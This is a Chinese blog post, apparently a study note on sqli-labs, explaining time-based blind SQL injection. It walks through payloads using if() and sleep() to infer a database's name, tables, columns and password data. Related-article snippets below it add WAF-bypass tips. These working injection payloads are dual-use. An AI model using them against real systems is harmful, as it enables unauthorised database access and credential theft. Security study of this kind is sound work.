时间盲注 延时

最新推荐文章于 2024-08-07 21:53:08 发布
最新推荐文章于 2024-08-07 21:53:08 发布
阅读量58 收藏
点赞数
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/s_hiy_iyi/article/details/133131915
版权

由于服务器端拼接了SQL语句,且正确和错误存在同样的回显,即是错误信息被过滤,可以通过页面响应时间进行按位判断数据。由于时间盲注中的函数是在数据库中执行的,但是sleep函数或者benchmark函数的过多执行会让服务器负载过高
1.2、原理:
当对数据库进行查询操作,如果查询的条件不存在,语句执行的速度非常快,执行时间基本可以认为是0,通过控制sql语句的执行时间来判断

判断注入点

"and 1=1--+  页面返回有数据

"and 1=0--+  页面返回有数据

则:页面的返回没有变化,可能是盲注

猜数据库名称长度

"and if((length(database()))=10,sleep(5),1)--+  页面延时了

则:当前数据库名称长度为 10

猜数据库名称(ASCII码)

"and if(ascii(substr(database(),1,1))=107,sleep(5),1)--+  页面延时了

则:数据库第一个字母是k... 类推得到数据库名

猜表名长度
?id=1' and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>3,sleep(5),1)--+

猜表名
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>60,  sleep(5),1)--+

猜字段长度

?id=1' and if(length((select column_name from information_schema.columns where table_name='users' limit 0,1))>3,sleep(5),1)--+

猜字段名
?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>10,sleep(5),1)--+

猜数据

?id=1' and if(ascii(substr((select password from security.users limit 0,1),1,1))>10, sleep(5),0)--+

偷马的十一
关注
《网络安全自学教程》- SQL注入之时间盲注原理+步骤+实战操作
wangyuxiang946的博客
05-21 9339
这篇文章为大家解析时间盲注的实现原理,结合实战案例讲解时间盲注的操作步骤以及时间误差的判断
SQL注入--盲注(布尔与延时)
weixin_44940180的博客
08-07 1273
布尔与延时盲注的区别 首先,使用二者的前提是,在参数错误的情况下(例如:1’)不会返回报错信息 布尔盲注:在正确与错误参数下,页面返回的信息有所不同 延时盲注:不论输入正确或错误参数,页面没有明显区别 时间盲注更像是布尔盲注的升级,布尔盲注的时候比较直观的变化 所以这个时候基于时间盲注,也就是在基于布尔的盲注上结合if判断和sleep()或benchmark()函数来得到一个时间上的变换延迟的参照,也就可以让我们进行一些判断 盲注常使用的函数 length():确定字符长度 ascii():确定某个字
时间盲注SQL注入
SheXinK’s Blog
12-18 533
时间盲注SQL注入1、 SQL注入介绍2、 报错注入注入PHP代码3、 时间注入测试4、 SQL注入防御 1、 SQL注入介绍   SQL注入介绍:SQL注入介绍   注入产生原因:web应用程序对用户输入数据的合法性没有判断或过滤不严,导致恶意payload直接带入SQL语句执行,从而执行payload中非法操作! 2、 报错注入注入PHP代码   新建PHP文件,将下面代码复制到PHP文件中,...
SQL注入---时间盲注
最新发布
ningwangh的博客
08-07 1166
时间盲注使用的优先级并不高,通常是在联合注入、报错注入、布尔盲注都无法使用时才会考虑,希望这篇文章能带给你帮助。
SQL注入-时间盲注
WolvenSec的博客
06-03 2099
SQL时间盲注(Time-based Blind SQL Injection),又叫延时注入,是一种SQL注入攻击技术,用于在无法直接获取查询结果或查看响应内容变化的情况下,通过引入时间延迟来推断数据库的信息;时间盲注依赖于数据库执行查询时的时间延迟,通过观察响应时间的变化,攻击者可以推测出查询结果。这里以Sqli-Labs靶场的Less-9关卡为例子来阐述时间盲注的具体思路:进入关卡首先构建参数id。
SQL注入——时间盲注
heyingcheng的博客
03-07 1135
web页面只返回一个正常页面。利用,逐个猜解数据。但是前提是数据库会执行命令代码,只是不反馈页面信息。回顾:当页面有回显选择当页面没有回显但是有报错信息选择当页面既没有回显也没有报错,但是有页面真假值,选择没有回显,没有报错,没有页面真假值,选择。
10、注入篇--盲注时间盲注延时注入】
WX公众号-小白学安全
04-05 1645
文章目录原理利用防范靶场 原理 利用 防范 靶场
mysql时间盲注if的绕过_MySQL时间盲注五种延时方法 (PWNHUB 非预期解)
weixin_42382703的博客
01-19 955
PWNHUB 一道盲注题过滤了常规的sleep和benchmark函数,引发对时间盲注延时方法的思考。延时函数SLEEPmysql> select sleep(5);+----------+| sleep(5) |+----------+| 0 |+----------+1 row in set (5.00 sec)BENCHMARKmysql> select benc...
pikachu——时间盲注
Lollipop_zhi的博客
03-02 5025
如果是布尔盲注,页面上会有0和1的变化,但是时间盲注页面无变化,所以我们需要监控时间,通过后台执行时间来判断 首先输入’测试一下,时间0毫秒 输入kobe’ and 1=1#,时间还是0毫秒 借助sleep()函数,输入kobe’ and sleep(3)#,时间发生了变化 输入kobe’ and if ((substr(database(),1,1))=‘p’,sleep=(5),null)#,产生了延迟 substr(database(),1,1):截取数据库名称的第一个字符。 判断是否.
sql注入--时间盲注
pakho_C的博客
01-02 1742
sql注入–时间盲注 靶场:sqli-labs-master 下载链接:靶场下载链接 第九关 php源码 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connec
SQL注入之时间盲注相关
lee_james的博客
09-07 874
关于sql注入时间盲注应用场景的一些问题。
2024年网络安全最全超硬核,SQL注入之时间盲注,原理+步骤+实战思路(4),2024年最新字节跳动网络安全面试凉凉经
2401_84239830的博客
05-07 884
数据库在执行SQL时,会先找缓存,如果缓存存在一样的SQL,则会直接返回缓存中的查询结果,而不会查找数据库。我们截取第一个字符,穷举这95种可能性即可,为了方便猜解,我们将字符转换为ASCLL码再进行判断(字符对应的ASCLL为 32~126)。同样的payload,如果第一次响应时间很长,但第二次响应时间很短,就说明是受到了网络波动的影响。条件表达式结果为 False 时,会执行第三个参数位置的代码,即 3,自定义的占位符,无实际意义,页面正常响应。如果你能答对70%,找一个安全工作,问题不大。
超硬核,SQL注入之时间盲注,原理+步骤+实战思路(1)
2401_84296945的博客
04-30 1120
时间盲注是指基于时间盲注,也叫延时注入,根据页面的响应时间来判断是否存在注入。
sql注入知识---时间盲注
尘玥的故事
04-18 666
原理:在SQL注入过程中,无论注入是否成功,页面完全没有变化。此时只能通过使用数据库延时函数来判断注入点一般采用响应时间上的差异来判断是否存在SQL注入,即基于时间型的SQL盲注。第二个语句:语句最后加上and 1=2 形成查询逻辑错误,sleep函数不执行暂停,因此查询时间为0s。第一个语句:sleep函数设置查询停留3s, sleep函数本身返回值为0,显示查询时间为3s。SQL CASE 表达试是一种通用的条件表达试,类似其他语言的 if/else语句。除了Sleep之外的延迟。
sql注入之时间盲注
笔墨稠思
11-13 2777
什么是盲注? 所谓盲注,就是在服务器没有错误回显的时候完成注入攻击 什么是延时盲注? 通过web页面返回数据的时间差来判断注入语句是否正确 实现布尔盲注需要利用一下几个函数 length() 返回字符串长度 substr() 截取字符串 ascii() 返回字符的ascii码 sleep() 将程序挂起一段时间 if(exp1,exp2,exp3) 判断语句,第一个语句正确就执行第二个,否则执行第三个 靶场实战 首先判断是否存在注入
绕过waf的oracle时间盲注
06-06
绕过WAF的Oracle时间盲注可以考虑以下几个方面: 1. 使用不同的时间函数:WAF通常会限制sleep或dbms_lock.sleep等常用的时间函数,可以尝试使用其他的时间函数如sysdate、systimestamp等。 2. 调整延时时间:可以适当调整延时时间,使其不容易被WAF检测到。例如,可以使用多个较短的延时时间来代替单个较长的延时时间。 3. 拆分注入语句:可以将注入语句拆分成多个部分,每个部分只包含少量字符,减少被WAF检测到的概率。 4. 使用编码和混淆:可以使用编码和混淆技术来绕过WAF的检测。例如,可以使用十六进制编码、URL编码等将注入语句进行编码,或者使用大小写混淆等技术来掩盖注入语句。 5. 利用错误回显:如果WAF禁用了时间函数,可以考虑利用错误回显来实现盲注。例如,可以构造一些错误的SQL语句,通过错误信息来获取注入结果。 需要注意的是,绕过WAF需要综合考虑多个因素,包括WAF的规则、目标系统的配置和漏洞特点等。同时,注入操作需要谨慎处理,避免对系统造成不必要的影响和风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值